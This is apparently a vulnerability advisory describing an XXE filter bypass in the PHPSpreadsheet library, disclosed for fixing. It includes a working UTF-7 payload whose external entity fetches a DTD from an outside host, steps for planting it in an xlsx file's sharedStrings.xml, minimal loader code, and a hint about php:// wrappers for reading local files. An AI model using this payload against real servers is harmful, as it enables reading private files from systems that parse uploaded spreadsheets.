XXE in PHPSpreadsheet encoding is returned

Summary

Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack)

Details

Check $pattern = '/encoding="(.*?)"/'; easy to bypass. Just use a single quote symbol '. So payload looks like this:

<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>

If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute.

PoC

1. Create simple xlsx file
2. Rename xlsx to zip
3. Go to the zip and open the xl/sharedStrings.xml file in edit mode.
4. Replace <?xml version="1.0" encoding="UTF-8" standalone="yes"?> to

<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>

5. Save sharedStrings.xml file and rename zip back to xlsx.
6. Use minimal php code that simply opens this xlsx file:

use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");

7. You will receive the request to your http://%webhook%/file.dtd
8. Dont’t forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.

Impact

Read local files